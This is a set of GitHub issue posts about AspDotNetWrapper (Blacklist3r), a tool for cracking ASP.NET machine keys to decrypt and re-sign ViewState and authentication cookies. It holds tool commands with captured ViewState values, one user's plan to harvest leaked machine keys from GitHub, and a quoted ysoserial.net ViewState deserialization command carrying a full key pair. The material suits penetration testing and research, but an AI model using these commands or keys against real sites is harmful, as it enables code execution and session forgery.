Hello - thanks for the tool, is there somewhere the specifies all of the flag options for things like "purpose" and the other flags?

I get these errors even on using previous and latest releases.

The command I used is :-
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTg0MzcxNzgzNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFJmN0bDAwJENvbnElbnRQbGFjZUhvbGRicjEkSW1hZ2VCdXR0b24zBSZjdGwwMCRDb2250ZW50UGxhY2Vlb2xkZXlxJEltYWdlQnV0dG9uMU3je+cjx5/7z0zvwlrr8SPmt2y8== --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode --IISDirPath "/" --TargetPagePath "/Default.aspx/" -f out.txt

And got these errors :-
Unhandled Exception: System.FormatException: Invalid length for a Base-64 char array or string. at System.Convert.FromBase64_Decode(Char* startInputPtr, Int32 inputLength, Byte* startDestPtr, Int32 destLength) at System.Convert.FromBase64CharPtr(Char* inputPtr, Int32 inputLength) at System.Convert.FromBase64String(String s) at NotSoSecure.AspDotNetWrapper.DefinePurpose.GetProtectedData(String strEncryptedText) at NotSoSecure.AspDotNetWrapper.AspDotNetWrapper.Main(String[] args)
Please note that the value of viewstate didn't contained "==". I added them by reading a post on StackOverFlow . But still got no luck with the errors.

Hi,

My encrypted data is 9359 chars. Command prompt only allows 8191 chars. I think there should be a parameter for --encrypteddata that takes a filepath, such as --encrypteddatapath where the program can take the encrypted data from a text file. Very cool program!

Best,
Alex

Hello,

After compiling the tool in visual studio I don't have the same option as you :

From the readme:

On my side:

So of course, when I try with a sample command like

`AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie  --valalgo=hmacsha512 --decalgo=aes

I have this error:

ERROR(S):
  Option 'valalgo' is unknown.
  Option 'decalgo' is unknown.
  Option 'legacy' is unknown.

We use the same version, any idea why I didn't have all options available ?

\

Hey,

I am trying to understand the machine keys file.

is that just the machine keys or is there a way i can provide a big list of validation key and decryption keys to add to the system?

I am going through github and pulling what keys i can to help add to potential hits.

is it layed out like.

decryptionKey,validationKey

Hi, I was following the example highlighted on the article below, and I've noticed that the AspDotNetWrapper is not generating any output.

https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy

I downloaded the Github Project, and I built it in VS.net, but the exe is not giving me anything

Hello ,,
thank you very much for this software.
Does Blacklist3r for ViewState produced with (.Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true ) work?
And that legacy is unknown in Blacklist3r.

Awesome tool please add a link in the description to your blog post explaining it in detail: https://www.notsosecure.com/project-blacklist3r/

Please explain how you compile this in visual studio code. Would really help alot!

can not found,why?

.\AspDotNetWrapper.exe  --keypath MachineKeys.txt --encrypteddata "/wEPDwUJMzk1NzA1NjUzDxYIHgtDTElFTlRFTUFJTGUeDENMSUVOVE1PQklMRWUeCUlSRVRSWUNOVGYeDl9Jc0VtYWlsTW9iaWxlZRYCAgMPZBYIAgEPFgIeCWlubmVyaHRtbAUWSUlGTCAtIEZvcmdvdCBQYXNzd29yZGQCAw9kFgJmDxYCHwQFD0ZvcmdvdCBQYXNzd29yZGQCBw9kFggCAw8PFgIeBFRleHRlZGQCCQ8PFgIeB0VuYWJsZWRoZGQCCw8PFgIfBQUBMGRkAg0PDxYCHwUFATBkZAIJD2QWBAIBDxYCHwQFE0VudGVyIE5ldyBQYXNzd29yZC5kAgMPFgIeB1Zpc2libGVoFgJmD2QWBgIBDw8WAh8HaGRkAgMPDxYEHwZoHwdoZGQCBQ8PFgQfB2gfBmhkZGTnxJZ8skNiBSTEHo2z4QrLxX2wbCw3GoCrWrPOnOfJMg==" --decrypt --purpose=viewstate --modifier=ECA7C9A2 --macdecode --TargetPagePath "/OTPGeneration/frmOTPGeneration.aspx?RqtpAs=PM2SLMF5T" -f out.txt --IISDirPath="/"

Hi,

First thanks a lot for this tool 💯

I have found the following key pair on this site that is not present into the MachineKeys.txt file of the last release bundle:

Keys:

• Decryption key: EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39.
• Validation key: B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3.

Section of the blog post with the mentioned key pair:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" \
--path="/site/test.aspx/" \
--apppath="/directory" \
--decryptionalg="AES" \ 
--decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" \
--validationalg="SHA1"  \
--validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3"

Thanks in advance 😃

Decryption of cookie is working but again encrypting the same file is not working(even without any modification)
Encrypt: AspDotNetWrapper.exe --keypath MachineKeys.txt -p aspxauth --cookie 490E807FAF8AA1ED00526434900ECBE308314B62C87037458E6F22980208DD7ACAC41DF05D3013D7E91DEE127E4E5A4E2499483B4BD0F5872934BBD5D1C2B81A9054A197 -a SHA1 -b 3DES --decrypt

Decrypt: AspDotNetWrapper.exe -f DecryptedText.txt
Error:
EncryptedData

Unhandled Exception: System.Security.Cryptography.CryptographicException: Specified initialization vector (IV) does not match the block size for this algorithm.
at System.Security.Cryptography.SymmetricAlgorithm.set_IV(Byte[] value)
at System.Web.Security.Cryptography.NetFXCryptoService.Protect(Byte[] clearData)
at System.Web.Security.Cryptography.HomogenizingCryptoServiceWrapper.HomogenizeErrors(Func`2 func, Byte[] input)
at NotSoSecure.AspDotNetWrapper.EncryptDecrypt.EncryptData(String strDecryptDataFilePath)
at NotSoSecure.AspDotNetWrapper.AspDotNetWrapper.Main(String[] args)

The maximum length of the string that you can use in command prompt is 8191 characters. I am trying to use AspDotNetWrapper, however the viewstate is over 50,000 characters long. In the case that the encrypteddata is longer than the maximum allowed length I don't know of any way to run the executable other than changing it so that a file path is accepted in place of the value itself

Hello,

Following this https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/ the command are not working anymore

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate  --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy

AspDotNetWrapper 2.0.0.0
Copyright c  2019
ERROR(S):
Option 'valalgo' is unknown.
Option 'decalgo' is unknown.
Option 'legacy' is unknown.

 -r, --keypath                Machine keys file path.

 -c, --encrypteddata          Encrypted data value to decrypt.

 -d, --decrypt                (Default: false) To decrypt the encrypted data.

 -f, --decryptDataFilePath    file path where the decrypted information stored

 -p, --purpose                purpose

 -m, --modifier               Modifier used to encode the viewstate

 -s, --macdecode              Used to decide whether viewstate is MAC enabled or not

 -o, --outputFile             Output file path

 -i, --IISDirPath             Application dir path in IIS tree

 -t, --TargetPagePath         Target page path

 -v, --antiCSRFToken          Anti CSRF token

 --help                       Display this help screen.

 --version                    Display version information.

Required option missing!!
-------------------------
-f, --decryptDataFilePath    file path where the decrpted information stored
--help Display this help screen.
--version Display version information.

I think the new version test everything, this issue is more related to the article itself :)